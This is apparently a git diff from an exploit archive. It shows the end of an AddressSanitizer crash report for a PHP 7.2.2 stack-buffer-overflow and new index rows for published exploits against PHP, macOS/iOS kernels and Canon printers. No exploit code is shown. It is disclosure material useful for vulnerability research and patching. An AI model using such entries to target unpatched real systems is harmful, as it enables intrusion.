+SUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex
+Shadow bytes around the buggy address:
+  0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4
+  0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4
+  0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4
+  0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00
+=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00
+  0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2
+  0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:     fa
+  Heap righ redzone:     fb
+  Freed Heap region:     fd
+  Stack left redzone:    f1
+  Stack mid redzone:     f2
+  Stack right redzone:   f3
+  Stack partial redzone: f4
+  Stack after return:    f5
+  Stack use after scope: f8
+  Global redzone:        f9
+  Global init order:     f6
+  Poisoned by user:      f7
+  ASan internal:         fe
+==26249== ABORTING
+Aborted

files_exploits.csv

@@ -5987,6 +5987,10 @@ id,file,description,date,author,type,platform,port
 44817,exploits/windows/dos/44817.js,"Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion",2018-05-31,"Google Security Research",dos,windows,
 44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple,
 44832,exploits/linux/dos/44832.txt,"Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption",2018-06-05,"Google Security Research",dos,linux,
+44846,exploits/php/dos/44846.txt,"PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow",2018-06-06,"Wei Lei and Liu Yang",dos,php,
+44847,exploits/macos/dos/44847.c,"macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos,
+44848,exploits/multiple/dos/44848.c,"macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple,
+44849,exploits/multiple/dos/44849.txt,"XNU Kernel - Heap Overflow Due to Bad Bounds Checking in MPTCP",2018-06-06,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -39507,3 +39511,5 @@ id,file,description,date,author,type,platform,port
 44837,exploits/php/webapps/44837.py,"Pagekit < 1.0.13 - Cross-Site Scripting Code Generator",2018-06-05,DEEPIN2,webapps,php,
 44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware,
 44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux,
+44844,exploits/hardware/webapps/44844.txt,"Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware,
+44845,exploits/hardware/webapps/44845.txt,"Canon MF210/MF220 - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware,